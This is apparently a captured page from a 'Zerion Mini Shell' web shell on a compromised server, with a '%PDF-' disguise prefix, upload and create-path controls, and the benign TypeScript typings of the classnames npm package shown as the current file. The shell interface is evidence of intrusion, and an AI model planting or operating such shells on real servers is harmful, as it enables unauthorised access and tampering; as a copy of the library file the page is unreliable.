%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/node_modules/classnames/
Upload File :
Create Path :
Current File : //var/www/html/node_modules/classnames/index.d.ts

// LICENSE is MIT
//
// Copyright (c) 2018
//   Dave Keen <http://www.keendevelopment.ch>
//   Adi Dahiya <https://github.com/adidahiya>
//   Jason Killian <https://github.com/JKillian>
//   Sean Kelley <https://github.com/seansfkelley>
//   Michal Adamczyk <https://github.com/mradamczyk>
//   Marvin Hagemeister <https://github.com/marvinhagemeister>

export type Value = string | number | boolean | undefined | null;
export type Mapping = { [key: string]: any };
export type Argument = Value | Mapping | Argument[];

export default function classNames(...args: Argument[]): string;

Zerion Mini Shell 1.0